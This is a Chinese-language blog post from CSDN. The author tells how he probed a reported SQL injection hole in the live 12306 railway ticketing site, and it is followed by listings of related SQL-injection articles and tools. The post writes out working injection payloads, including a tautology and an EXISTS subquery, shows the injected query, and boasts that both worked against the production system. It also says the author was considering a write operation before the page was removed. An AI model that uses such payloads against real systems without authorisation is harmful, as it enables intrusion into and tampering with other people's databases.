玩玩12306的SQL注入漏洞

最新推荐文章于 2021-10-22 04:43:21 发布
最新推荐文章于 2021-10-22 04:43:21 发布
阅读量4.6k 收藏 2
点赞数 3
分类专栏: SQL/noSQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linvo/article/details/8026373
版权

下午那会儿微博上疯传一张12306的SQL注入漏洞截图:


以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。

根据trace提示简单构造一个:

' OR '1'='1' OR ZIZ='

注入后的效果应就是:

select * from TB_INFO_CLCS  where flag = 'Y'  and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm


果了个然~!成功鸟~!

同理再构造个子查询:

' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR  ZIZ='

没报错,又成功鸟~!

当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:


晚上回家后发现该漏洞已经修复鸟~~~~~~

Linvo
关注
专栏目录
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5056
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
正方教务系统新版sql注入漏洞利用工具
01-19
本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后...
12306 SQL注入
vagabond1的专栏
09-28 1962
更可笑的最基本的“SQL 注入”都不防止。你用Hibernate 也就罢了,居然不用其对象方法,而是直接拼装 SQL 语句,这要多菜鸟的水平才做得出来啊。测试,框架,规范设计都是作坊式的才写得出来。就是我的开发组都不会犯这样的错误。 Hibernate 虽然开发方便,但是存在严重的效率问题。Hibernate 不适合大数据类型开发是人所共知的事情。 http://www.wooyun.org/
12306曝光sql注入漏洞,我试着发布解决方案
轻轻草原
09-29 216
12306曝光sql注入漏洞,我试着发布解决方案 在项目中,运用Ibatis中Like写法,没有研究下,结果SQL语句存在SQL注入,整理下,下次谨记啊! sql语句: select * from ( select 1 from poll <dynamic prepend= " where " > <isNotEmpty prepend=" and " pr...
吐槽一下12306SQL注入漏洞
weixin_34194379的博客
12-27 125
为什么80%的码农都做不了架构师?>>> ...
12306,SQL彻底暴露了你们的水平!
weixin_34082854的博客
09-27 212
1、这么大的数据量,敢用select * 2、还用了Like 3、自重字段,用了字符串类型 4、SQL语句直接抛给前台界面,数据结构泄露 5、SQL直接拼串,完全无视SQL注入 打眼一看,全是BUG,有耐心的筒子们继续补充吧。我还怀疑,他们不会没建索引吧?http://www.oschina.net/code/snippet_580223_14145 转...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
AspCMS commentList.asp SQL注入漏洞.md
最新发布
04-08
AspCMS commentList.asp SQL注入漏洞.md
SQL注入的一个ASP网站源码
12-29
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
SQL注入攻击演示代码
qiangzhuangchao4049的博客
04-10 1443
数据库截图: package TestJDBC;import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement;/** * sql注入攻击的演示代码 * @author Administrator * */ public class
Pikachu漏洞靶场系列之SQL注入
weixin_45868644的博客
10-22 3111
文章目录1.概述1.1.发生原因1.2.注入点类型1.3.SQL注入流程2.数字型注入(POST)2.1.简易2.2.拓展3.字符型注入(GET)4.搜索型注入4.1.拓展5.XX型注入6.insert/update/delete注入6.1.基于函数报错注入总结 1.概述 1.1.发生原因 Web应用程序对用户输入的合法性没有判断或者过滤不严,用户在输入的字符串之中注入SQL指令,导致这些注入进去的恶意指令被数据库误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 比如我们期望用户输入整数的id,但是
html sql注入_智能化扫描场景分析—精细化扫描SQL注入漏洞
weixin_39695241的博客
11-26 260
SQL注入漏洞,是攻击者对数据库进行攻击的常用手段之一,其本质是攻击者输入的数据可以被当做代码来执行,进而获取到数据库的控制权限。由于危险等级和出现频次常常较高,SQL注入漏洞正无时无刻不受到企业安全人员的重视。先来看以下几组数据。OWASP在2013年和2017年先后发布了两个版本的《Top 10 Web应用程序安全风险报告》,随着Web应用架构和技术的不断发展,应用程序的基础技术和结构发生了重...
转载:SQL注入Mysql
水墨痕迹
06-22 177
SQL注入Mysql(图)时间:2005-09-20 18:49来源:中国网管联盟 bitsCN编辑字体:[大 中 小] 声明   本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有代码均为本人所写,所有数据均经过测试。绝对真实。如果有什么遗漏或错误,欢迎来安全天使论坛(http://www.4ngel.net/forums)和我交流。 前言   2003年开始,喜欢脚本攻击的人...
sqlmap mysql案例_sqlmap简单mysql注入演示附截图
weixin_39986973的博客
01-19 125
安装教程百度一下就有了.首先下载需要的文件,如果是windows环境直接到看大牛的视频,学习一下,附上截图....算是转载吧...只是为了分享一下..下边是实例:sqlmap.py -update 更新-h helpsqlmap.py -u --dbms "Mysql" --current-user/* 注解:获取当前用户名称current user: ...
SQLMASQLMAP中文说明(linux版本)
weixin_34007906的博客
06-22 206
2019独角兽企业重金招聘Python工程师标准>>> ...
sql 截取_某CMS的多处SQL注入审计分析
weixin_39608118的博客
11-26 98
前言某天挖完洞闲来无事浏览CNVD看到某CMS更新了一溜的SQL注入,似乎起了强迫症,于是准备分析学习记录一下,顺便填充一下工作内容(哈哈题外话请忽略),其实是个小众CMS,分析起来也不算难,后台的比较简单,主要看前台的。版本:2.0.2PS:官方已跟新至了最新版本,且在最新版修复了以下漏洞。该文仅作学习和交流。SQL注入1-后台de***.php对应CNVD编号:CNVD-2020-12871漏...
SQL注入攻防入门详解
weixin_30399055的博客
12-01 152
毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见。 (对于sql注入的攻防,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门查看大量前辈们的心得,这方面的资料颇多,将其精简出自己觉得重要的,...
SQL注入漏洞详解与防护
"SQL注入漏洞全接触" SQL注入是一种常见的网络安全问题,主要发生在Web应用程序中,尤其是那些没有正确处理用户输入的程序。攻击者通过在URL、表单输入或其他用户交互点提交恶意构造的SQL代码,使得这些代码能够与...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值